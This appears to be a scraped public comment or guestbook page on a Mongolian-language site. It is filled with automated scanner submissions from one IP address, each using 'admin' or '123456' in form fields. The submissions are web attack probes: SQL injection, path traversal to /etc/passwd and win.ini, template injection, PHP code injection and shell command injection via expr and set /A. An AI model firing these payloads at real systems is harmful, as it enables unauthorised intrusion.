 • admin'and/**/extractvalue(1,concat(char(126),md5(1963437775)))and' 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456"and"m"="m
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'"\(
 • admin 194.163.191.42 132 өдөр

  123456'and't'='i
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 132 өдөр

  123456'and'n'='n
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1101367315')))>'0
 • admin 194.163.191.42 132 өдөр

  123456/**/and+0=9
 • admin 194.163.191.42 132 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1099660843')))
 • admin 194.163.191.42 132 өдөр

  123456/**/and+4=4
 • admin 194.163.191.42 132 өдөр

  123456/**/and/**/cast(md5('1226706655')as/**/int)>0
 • admin 194.163.191.42 132 өдөр

  123456'and(select'1'from/**/cast(md5(1394121474)as/**/int))>'0
 • admin 194.163.191.42 132 өдөр

  extractvalue(1,concat(char(126),md5(1809306156)))
 • admin 194.163.191.42 132 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1603405583)))and"
 • admin 194.163.191.42 132 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1512701538)))and'
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 132 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 132 өдөр

  123456
 • <%- 845554580+800794082 %> 194.163.191.42 132 өдөр

  123456
 • #set($c=941848908+995955652)${c}$c 194.163.191.42 132 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 132 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • ${(954963472+829147177)?c} 194.163.191.42 132 өдөр

  123456
 • ${860264481+935658524} 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • /etc/passwd 194.163.191.42 132 өдөр

  123456
 • /*1*/{{891976711+859900970}} 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 132 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  <%- 968377189+876501653 %>
 • ./../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  #set($c=809587395+971741148)${c}$c
 • expr 871982989 + 996503707 194.163.191.42 132 өдөр

  123456
 • '-var_dump(md5(288130279))-' 194.163.191.42 132 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • admin&set /A 897557715+906071004 194.163.191.42 132 өдөр

  123456
 • ${@var_dump(md5(519946528))}; 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  ${(938804366+897461461)?c}
 • ../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  '-var_dump(md5(567700093))-'
 • admin$(expr 856660472 + 890737103) 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  ${840798209+884478665}
 • admin 194.163.191.42 132 өдөр

  ${@var_dump(md5(121843830))};
 • admin|expr 999710651 + 897401228 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  /*1*/{{825721261+857231064}}
 • admin expr 951953831 + 881933209 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  expr 878447997 + 979321898
 • tybsrlwaceseccogccpz 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456&set /A 886970207+981717420
 • admin 194.163.191.42 132 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456$(expr 858003225 + 892285057)
 • admin 194.163.191.42 132 өдөр

  tybsrlwaceseccogccpz
 • admin 194.163.191.42 132 өдөр

  123456
 • ${922611342+928118085} 194.163.191.42 132 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456|expr 800583904 + 913153495
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  ${826085876+980589703}
 • admin 194.163.191.42 132 өдөр

  123456 expr 815154839 + 933136161
 • admin 194.163.191.42 132 өдөр

  123456